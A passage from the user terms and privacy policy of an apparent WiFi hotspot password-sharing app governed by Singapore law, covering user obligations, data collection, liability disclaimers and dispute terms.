(c) not assign or otherwise transfer your account to any other person or legal entity;
(d) not use an account that is subject to any rights of or belonging to a person other than you without appropriate authorization;
(e) not use the Service or Application:
(i) for unlawful purposes, including but not limited to sending or storing any unlawful material or for fraudulent purposes;
(ii) to send spam or otherwise duplicative or unsolicited messages in violation of applicable laws;
(iii) to send or store infringing, obscene, threatening, libelous, or otherwise unlawful or tortious material, including material harmful to children or in any way which violates any third party’s privacy or other rights;
(iv) to send or store material containing software viruses, worms, Trojan horses, malware or other harmful computer code, files, scripts, agents or programs;
(v) to interfere with or disrupt the integrity or performance of the Website, the Application or Service or the data contained therein;
(vi) for any form of malicious intent;
(vii) to cause nuisance, annoyance or inconvenience;
(viii) to upload or download large files or other unfair uses that may cause impairment of the Service for other Users, Registered Users or the Access Provider;
(f) not impair the proper operation of the network;
(g) not try to harm the Service or Application in any way whatsoever;
(h) not copy or distribute the Application or other content without our prior written permission;
(i) provide us with whatever proof of identity we may reasonably request;
(j) only share an Internet access point or information relating to an Internet access point which you own or are authorized to share;
(k) be responsible for ensuring that any information provided by you in relation to any Internet access point, including access passwords, are kept updated, unless you have notified us in accordance with these User Terms of your wish to withdraw your consent to sharing information to access your Internet access point. If there is any change to such information, you shall notify us and update such information within a reasonable period of time;
(l) notify us in writing if you wish to withdraw your consent to sharing or providing information relating to an Internet access point through the Application. We will remove all information relating to the Internet access point provided by you from the Application within 60 days of receipt of such notification from you;
(m) be responsible for standard messaging charges when requesting the Service or joining any contest held by us by SMS (if available in your jurisdiction);
not use the Service or Application with an incompatible or unauthorized device; and
(o) comply with all applicable laws of your home nation, the country, state and/or city in which you are present while using the Application or Service.
2.2 You must not attempt to gain unauthorized access to the Website, the Application or Service or its related systems or networks.
2.3 We may at our sole discretion cancel or delete your registered account if it has not been active for a reasonably long time.
3. Privacy Policy
Definition of personal data
You acknowledge that personal data is defined as data from which an individual (meaning a living or deceased natural individual and not including legal individuals such as incorporated bodies) can be identified. Examples of this may include: your official name, ID number, phone number, IP address and the email account you used to log in Google Play.
For what purposes do we process your personal data?
When you visit our Website and/or use our Application, we may process technical data such as your IP-address, visited webpages, the internet browser you use, your previous/next visited websites and the duration of a visit/session to enable us to deliver the functionalities of the Website and our Application. In addition, in certain instances, the browser and/or the Application may prompt you for your geo-location to allow us to provide you with an enhanced experience. With this technical data, our administrators can manage the Website and the Application, for instance by resolving technical difficulties or improving the accessibility of certain parts of the Website and/or the Application. This way, we are better able to ensure that you can (continue to) find the information on the Website and/or the Application in a quick and simple manner.
When you visit our Website and/or use our Application, we will also collect and process your data, such as your IP-address, country, language, mobile number, IMEI, device ID, MAC-address, information about the manufacturer, model, and operating system of your mobile device, including your mobile device’s screen resolution, and access point information, including SSID and BSSID. We use this data to enable us to deliver the functionalities of the Application, resolve technical difficulties, and provide you with the correct and most up to date version of the Application and to improve the operation of the Application.
When you register as a Registered User, we will collect your country, language, password, mobile phone number, IP-address and MAC-address. We will use your contact details to send you a welcoming SMS to verify your phone number and password, to communicate with you in response to your inquiries, and to send you service-related announcements, for instance, if our Service is temporarily suspended for maintenance. We will use your registration information to create and manage your account. If you are required to SMS us to complete the registration, standard SMS charges may apply.
We may also use your contact details to send you general updates regarding our news, special offers and promotions with your prior consent. You may at all times opt-out of receiving these updates by emailing us at [email protected] or by following the steps to unsubscribe more fully described in any relevant email you receive from us.
We also use your personal data in an anonymised and aggregated form to closely monitor which features of the Service are used most, to analyze usage patterns and to determine where we should offer or focus our Service. We may share this anonymised information with third parties for industry analysis and statistics.
Referrals
If you choose to use our referral feature in the Application to tell a friend about our Service, you will be prompted to enter your friend’s email address or mobile phone number or log into your preferred social network. Please ensure that you have your friend’s express permission to disclose this personal data before providing it to us. If you elect to refer a friend, we will automatically populate a message for you to send to your friend inviting him or her to try the Service on your behalf, however the actual message will be sent via your mobile device or social network and you will be able to edit the final message before you send it. We do not store your friend’s data.
Disclosure of personal data
When you request for Internet access services via the Application, we do not provide your personal data to any Access Provider.
We may employ third party companies (including our affiliated companies) and individuals to facilitate or provide the Service on our behalf, to provide customer support, to backup, maintain and process data (including your personal data we collected), to host our job application form, to perform Website-related services (e.g., without limitation, maintenance services, database management, web analytics and improvement of the Website or Application’s features) or to assist us in analyzing how our Service is used. These third parties have access to your personal information only to perform these tasks on our behalf, are contractually bound not to disclose or use it for any other purpose, and are bound by legally enforceable obligations to provide to your personal information a standard of protection that is comparable to that under the Personal Data Protection Act (2012) of Singapore, as amended from time to time.
We will disclose your personal data to the extent that this is legally required, necessary for the establishment, exercise or defense of legal claims and legal process, or in the event of an emergency pertaining to your health and/or safety.
Your rights regarding personal data
As a User or Registered User, you have the right to access information regarding your personal account, including information that you’ve provided to us. You may at any time request correction or erasure of your personal data, and object to any processing of your personal data by emailing us at [email protected]. We will respond to your access and/or correction request within four weeks. You may also amend your personal details and withdraw any given consent using your account.
Security of personal data
We have taken appropriate technical and organizational security measures against loss or unlawful processing of your personal data. To this purpose, your personal data is securely stored within our database, and we use standard, industry-wide, commercially reasonable security practices as well as physical safeguards of the locations where data are stored. However, as effective as encryption technology is, no security system is impenetrable. We cannot guarantee the security of our database, nor can we guarantee that information you supply will not be intercepted while being transmitted to us over the Internet. Any transmission of information by you to us or to any third party is at your own risk.
4. Software Trademark
Any IPR involved in the Application, Services and Website (including that of our Connected Partners) signs and names of products and services shall be owned by us (or our Connected Partners as applicable). You are not allowed to display, use or otherwise deal with our (or our Connected Partners’) IPR or signs by any means or represent that you have the right to display, use or otherwise deal with such IPR or signs without our prior written consent. “IPR” shall mean any copyright, design rights (whether registered or unregistered), database rights, patents, utility models, trademarks, signs, logos, trade names, domain names and topography rights and any other intellectual property having a similar nature of equivalent effect anywhere in the world and any applications for or registrations of any of these rights.
5. Liability and Disclaimers
5.1 We shall in no circumstances be liable for:
(a) information or content transmitted over a WiFi hotspot by you or any User, Registered User or third party. Any information or content transmitted by you or other Users or Registered Users of the Application or third parties through the Application does not represent our view or policy;
(b) damages resulting from the use of (or the inability to use) electronic means of communication through the Website or the Application, including, but not limited to, damages resulting from failure or delay in delivery of electronic communications, interception or manipulation of electronic communications by third parties or computer programs, and the transmission of viruses;
(c) damages resulting from the use of (or inability to use) the Website or Application, including damages caused by malware, viruses or any incorrectness or incompleteness of the information on the Website or Application;
(d) any damages, loss or third party claims resulting from your sharing of or providing access to a WiFi hotspot;
(e) the quality of the Internet access services provided by the Access Provider or any acts, actions, behaviour, conduct, and/or negligence on the part of the Access Provider. Any complaints about the Internet access services provided by the Access Provider should therefore be submitted to the Access Provider;
(f) any server crash or network interruptions caused by any event of force majeure or any other circumstance outside of our control, including any data loss or other damage suffered by you;
(g) any data loss or other damage suffered by you during or in connection with any upgrade of the Services, Website or Application; and
(h) any costs incurred by you, including any charges for data, messaging and other wireless access services, associated with your use the Application.
5.2 You hereby agree to compensate and indemnify us and any of our contracted partners and affiliates (our “Connected Partners”) for any claims, suits, requests, damages or losses, including reasonable attorney’s fees, from third-parties resulting from the your breach of this Agreement or resulting from information or content transmitted over a WiFi hotspot by you or any User, Registered User or third party, and hold us and our Connected Partners harmless for any claims, requests and suits against us or our Connected Partners.
5.3 You hereby acknowledge and agree that to the extent permitted by applicable law, we shall not be liable to you for any direct, indirect, accidental, special or follow-up losses, damages or risks caused by your use of or failure to use the Application and/or Services.
Your warranties, representations and undertakings
5.4 You shall be responsible for obtaining appropriate authorization from the owner of a WiFi hotspot when sharing such WiFi hotspot, including but not limited to the password and location of the WiFi hotspot, and for ensuring that all the information of any and all hotspots you share are secure. You hereby:
(a) warrant and undertake that you are either the owner of the WiFi hotspot or are appropriately and validly authorized by the owner of the WiFi hotspot to do so when sharing the details of such with us; and
(b) agree to indemnify us in respect of any loss or damage suffered by us in respect of a breach of this provision.
5.5 You hereby warrant, represent and undertake that any WiFi hotspot information obtained will be used by you strictly in compliance with any applicable laws. Any illegal action or breach of relevant law or rules is forbidden. We shall be exempted from any liability for any problems caused by the breach of this provision.
Exclusion of warranties
5.6 We do not provide the WiFi network connection or internet services and therefore we do not make any warranty or guarantee regarding the timeliness, security and accuracy of the Service, and you hereby agree that we shall have no liability to you in respect of or in connection with any communication failure.
5.7 To the extent permitted by applicable law, we do not give any warranties, representations or undertakings in respect of the Application, whether express or implied, or in decrees, including but not limited to problems related to merchantability, applicability, non-virus, negligence, or technological flaw, and any warrant and conditions, express or implied, to ownership and non-infringement.
6. Miscellaneous
6.1 You should read these User Terms clearly before using the Service, Website and/or Application.
6.2 Any invalidation of any clause, partly or wholly, shall not affect the validity of other clauses herein.
6.3 These User Terms shall be governed by the laws of Singapore. Any dispute, claim or controversy arising out of or relating to these User Terms or the breach, termination, enforcement, interpretation or validity thereof or the use of the Website, the Service or the Application (collectively, “Disputes”) will be settled exclusively by the competent court in Singapore.
6.4 These User Terms, together with any of our policies notified to you from time to time, set out the entire agreement between you and us and you have not entered into these User Terms in reliance upon any promise or understanding which is not expressly set out in these User Terms.
6.5 These User Terms may be translated into non-English language versions. In the event of any inconsistency, conflict or uncertainty between this English language version and any non-English language version of these User Terms, this English language version shall prevail and apply.
6.6 Any failure or delay by either of us in exercising our rights under these User Terms shall not constitute a waiver of such right and shall not restrict the further exercise of that right or any other remedy.
6.7 These User Terms shall apply to your relationship with us and shall not confer any rights on any third party.
Free WiFi Password
Last updated, Nov 2016
Wheres app